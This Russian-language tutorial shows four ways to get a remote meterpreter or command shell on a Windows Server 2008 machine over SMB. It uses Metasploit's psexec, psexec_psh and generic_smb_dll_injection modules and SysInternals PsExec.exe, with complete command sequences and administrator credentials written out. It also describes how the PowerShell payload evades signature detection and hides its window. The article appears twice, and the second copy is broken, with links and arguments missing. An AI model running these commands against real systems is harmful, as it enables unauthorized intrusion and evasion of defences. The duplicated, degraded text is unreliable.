Привет, всем! В этой статье я покажу способы получения активной сессии meterpreter, используя SMB протокол.
В качестве уязвимой машины мною был выбран Windows Server 2008, а в качестве атакующей системы Kali Linux 2016.2. Все, что нам необходимо для проведения атаки, это включенный SMB 2.0 сервис на сервере и Metasploit в Kali.
SMB 2.0 впервые стал использоваться в ОС Windows Vista и Windows Server 2008. Его назначение – применение в сфере сетевых файловых серверов нового поколения. В целях обратной совместимости Windows Server 2008 и Windows Vista поддерживают как SMB 1.0 так и SMB 2.0.
Итак, способ номер один (1): Microsoft Windows Authenticated User Code Execution.
Этот модуль использует действительное имя пользователя и пароль администратора (или хэш пароля) для выполнения произвольной полезной нагрузки. Этот модуль похож на "Psexec" от SysInternals. Модуль может стирать за собой данные. Сервис, созданный с помощью этого инструмента, использует случайно выбранное название и описание.
Запускаем Metasploit и выполняем следующие команды:
> use exploit/windows/smb/psexec
> set rhost 172.16.0.234
> set rport 445
> set smbuser Administrator
> set smbpass Adminroot123
> exploit
В итоге получаем сессию meterpreter:
Способ номер два (2): Microsoft Windows Authenticated PowerShell Command Execution.
Этот модуль так же использует действительное имя пользователя и пароль администратора для выполнения полезной нагрузки PowerShell, используя подобную технику как в утилите "Psexec", предоставленной SysInternals. Полезная нагрузка кодируется в base64 и выполняется из командной строки, используя закодированный командный флаг. С помощью этого метода, полезная нагрузка не записывается на диск, и при условии, что каждая нагрузка является уникальной, данный метод менее подвержен обнаружению на основе сигнатур. Неизменяемые опции, предоставленные для выполнения нагрузки, работают циклично, обеспечивая постоянность. Во избежание обнаружения, может быть добавлена задержка исполнения или другие методы запутывания. Для того, чтобы избежать интерактивных уведомлений процесса для текущего пользователя, пайлоад был уменьшен в размерах и завернут в PowerShell вызов, который скрывает окно целиком.
В Metasploit пишем:
> use exploit/windows/smb/psexec_psh
> set rport 445
> set rhost 172.16.0.234
> set smbuser Administrator
> set smbpass Adminroot123
> exploit
Как итог, все работает.
Третий способ (3): Generic SMB DLL injection:
Этот метод не похож на предыдущие, так как, используется DLL инъекция, которая дает возможность выполнять свой код в адресном пространстве уже запущенного процесса.
Выполняем следующие заклинания в Metasploit:
> use exploit/windows/smb/generic_smb_dll_injection
> set srvhost 192.168.31.201
> exploit
Сгенерированную команду необходимо выполнить в командной строке сервера:
В таком формате:
Получаем активную сессию meterpreter:
Заключительный, четвертый способ (4): Psexec.exe
Psexec.exe - это программное обеспечение, которое помогает нам получить доступ к другим компьютерам в сети. Это программное обеспечение непосредственно подводит нас к оболочке удаленного ПК. Получить его можно здесь:
>
Я тестировал его в Windows, для использования, вводим следующую команду в cmd (меняем путь согласно вашему расположению программы)
> C:\PSTools>PsExec.exe link removed –u Administrator –p Adminroot123 cmd
Где:
· link removed – Адрес тестируемого хоста
· -u – Имя пользователя
· -p – Пароль
· сmd – открыть командную строку
Соединение установлено успешно, убедимся в этом, посмотрев вывод команды:
> systeminfo
На данный момент, все. Надеюсь, кому то пригодится. Спасибо за внимание и т.д.
В качестве уязвимой машины мною был выбран Windows Server 2008, а в качестве атакующей системы Kali Linux 2016.2. Все, что нам необходимо для проведения атаки, это включенный SMB 2.0 сервис на сервере и Metasploit в Kali.
SMB 2.0 впервые стал использоваться в ОС Windows Vista и Windows Server 2008. Его назначение – применение в сфере сетевых файловых серверов нового поколения. В целях обратной совместимости Windows Server 2008 и Windows Vista поддерживают как SMB 1.0 так и SMB 2.0.
Итак, способ номер один (1): Microsoft Windows Authenticated User Code Execution.
Этот модуль использует действительное имя пользователя и пароль администратора (или хэш пароля) для выполнения произвольной полезной нагрузки. Этот модуль похож на "Psexec" от SysInternals. Модуль может стирать за собой данные. Сервис, созданный с помощью этого инструмента, использует случайно выбранное название и описание.
Запускаем Metasploit и выполняем следующие команды:
> use exploit/windows/smb/psexec
> set rhost 172.16.0.234
> set rport 445
> set smbuser Administrator
> set smbpass Adminroot123
> exploit
В итоге получаем сессию meterpreter:
Способ номер два (2): Microsoft Windows Authenticated PowerShell Command Execution.
Этот модуль так же использует действительное имя пользователя и пароль администратора для выполнения полезной нагрузки PowerShell, используя подобную технику как в утилите "Psexec", предоставленной SysInternals. Полезная нагрузка кодируется в base64 и выполняется из командной строки, используя закодированный командный флаг. С помощью этого метода, полезная нагрузка не записывается на диск, и при условии, что каждая нагрузка является уникальной, данный метод менее подвержен обнаружению на основе сигнатур. Неизменяемые опции, предоставленные для выполнения нагрузки, работают циклично, обеспечивая постоянность. Во избежание обнаружения, может быть добавлена задержка исполнения или другие методы запутывания. Для того, чтобы избежать интерактивных уведомлений процесса для текущего пользователя, пайлоад был уменьшен в размерах и завернут в PowerShell вызов, который скрывает окно целиком.
В Metasploit пишем:
> use exploit/windows/smb/psexec_psh
> set rport 445
> set rhost 172.16.0.234
> set smbuser Administrator
> set smbpass Adminroot123
> exploit
Как итог, все работает.
Третий способ (3): Generic SMB DLL injection:
Этот метод не похож на предыдущие, так как, используется DLL инъекция, которая дает возможность выполнять свой код в адресном пространстве уже запущенного процесса.
Выполняем следующие заклинания в Metasploit:
> use exploit/windows/smb/generic_smb_dll_injection
> set srvhost 192.168.31.201
> exploit
Сгенерированную команду необходимо выполнить в командной строке сервера:
В таком формате:
Получаем активную сессию meterpreter:
Заключительный, четвертый способ (4): Psexec.exe
Psexec.exe - это программное обеспечение, которое помогает нам получить доступ к другим компьютерам в сети. Это программное обеспечение непосредственно подводит нас к оболочке удаленного ПК. Получить его можно здесь:
>
Ссылка скрыта от гостей
Я тестировал его в Windows, для использования, вводим следующую команду в cmd (меняем путь согласно вашему расположению программы)
> C:\PSTools>PsExec.exe
Где:
·
· -u – Имя пользователя
· -p – Пароль
· сmd – открыть командную строку
Соединение установлено успешно, убедимся в этом, посмотрев вывод команды:
> systeminfo
На данный момент, все. Надеюсь, кому то пригодится. Спасибо за внимание и т.д.